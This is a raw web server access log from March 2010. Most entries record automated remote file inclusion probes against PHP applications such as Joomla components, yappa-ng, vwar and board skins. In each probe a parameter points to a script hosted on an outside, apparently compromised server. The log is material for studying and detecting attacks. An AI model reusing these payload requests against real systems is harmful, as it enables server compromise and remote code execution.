121.101.214.54 - - [05/Mar/2010:07:23:18 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:23:20 -0800] "GET /src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:23:20 -0800] "GET /logs/access_100206.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:07:23:20 -0800] "GET /logs/access_100209.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:07:23:20 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:23:20 -0800] "GET /logs/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:07:23:20 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:23:24 -0800] "GET /logs/access_100126.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:29 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:29 -0800] "GET /logs/access_100206.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:29 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:29 -0800] "GET /logs/access_100126.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:41 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:41 -0800] "GET /logs/access_100206.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:42 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:43 -0800] "GET /logs/access_100126.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:44 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:44 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:44 -0800] "GET /logs/access_100206.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:23:44 -0800] "GET /logs/access_100126.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:23:45 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:23:45 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:23:45 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.51.80.145 - - [05/Mar/2010:07:25:11 -0800] "GET / HTTP/1.1" 200 468 "http://www.macdomain.org/forums.php?m=posts&q=30&n=unread" "Mozilla/5.0 (Macintosh; U; PPC; en-US; rv:9.1) Clecko/20100217 Classilla/CFM" "pixero.net"
78.51.80.145 - - [05/Mar/2010:07:25:16 -0800] "GET /pnetsite/releases/PreviewRelease1.sit HTTP/1.1" 200 396354 "http://pixero.net/" "Mozilla/5.0 (Macintosh; U; PPC; en-US; rv:9.1) Clecko/20100217 Classilla/CFM" "pixero.net"
121.101.214.54 - - [05/Mar/2010:07:25:43 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:27:01 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:27:01 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:27:01 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:07:28:06 -0800] "GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:07:28:06 -0800] "GET /logs/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:07:28:06 -0800] "GET /logs/access_100128.log%20%20/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:28:17 -0800] "GET /logs/access_100224.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:28:17 -0800] "GET /logs/access_100131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:28:40 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:30:13 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:30:14 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:30:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:30:24 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:30:26 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:30:41 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:30:45 -0800] "GET /logs/access_100206.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:30:48 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:30:48 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:30:48 -0800] "GET /logs/access_100210.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:31:14 -0800] "GET /logs/access_100202.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:31:17 -0800] "GET /logs/access_100220.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:31:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:31:27 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:31:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:31:57 -0800] "GET /logs/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:31:57 -0800] "GET /logs/access_100206.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:31:59 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:31:59 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:01 -0800] "GET /logs/access_100126.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:32:01 -0800] "GET /src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:03 -0800] "GET /logs/access_100206.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:07:32:09 -0800] "GET /logs/access_100128.log/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:07:32:14 -0800] "GET /logs/access_100209.log/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:28 -0800] "GET /logs/access_100126.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:32 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:32 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:32:33 -0800] "GET /logs/access_100206.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:32:34 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:32:34 -0800] "GET /logs/access_100219.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:32:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:32:36 -0800] "GET /logs/access_100220.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:32:41 -0800] "GET /logs/access_100126.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:33:05 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:07:33:06 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:07:33:06 -0800] "GET /logs/access_100211.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:07:33:06 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:07:33:06 -0800] "GET /logs/access_100224.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:33:07 -0800] "GET /logs/access_100206.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:33:08 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:33:09 -0800] "GET /logs/access_100126.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:17 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:18 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:20 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:33:26 -0800] "GET /logs/access_100206.log/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [05/Mar/2010:07:33:29 -0800] "GET /logs/access_100221.log/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:31 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:31 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:33:31 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:33:37 -0800] "GET /logs/access_100126.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:33:58 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:33:58 -0800] "GET /logs/access_100210.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:33:58 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.48 - - [05/Mar/2010:07:34:03 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
41.204.218.244 - - [05/Mar/2010:07:34:32 -0800] "GET /logs/access_100202.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:35:17 -0800] "GET /logs/access_100217.log////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:35:17 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:35:17 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:35:25 -0800] "GET /logs/access_100209.log////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:07:36:23 -0800] "GET /logs/access_100222.log//?_REQUEST=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:07:36:23 -0800] "GET /logs//?_REQUEST=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:07:36:24 -0800] "GET /?_REQUEST=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:07:36:41 -0800] "GET /logs/access_100209.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:07:36:48 -0800] "GET /logs/access_100209.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:07:37:13 -0800] "GET /logs/access_100208.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:14 -0800] "GET /logs////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:14 -0800] "GET /logs/access_100211.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:15 -0800] "GET ///?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:18 -0800] "GET ///?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:18 -0800] "GET /logs////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:37:18 -0800] "GET /logs/access_100211.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:07:37:19 -0800] "GET /logs/access_100208.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:37:24 -0800] "GET /logs/access_100219.log/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:37:24 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:37:24 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.79.149.146 - - [05/Mar/2010:07:38:42 -0800] "GET /logs/access_100219.log/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.40.142.66 - - [05/Mar/2010:07:38:42 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.79.149.146 - - [05/Mar/2010:07:38:42 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:07:38:59 -0800] "GET /logs/access_100222.log%20%20//?_REQUEST=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:07:39:07 -0800] "GET /logs/access_100211.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
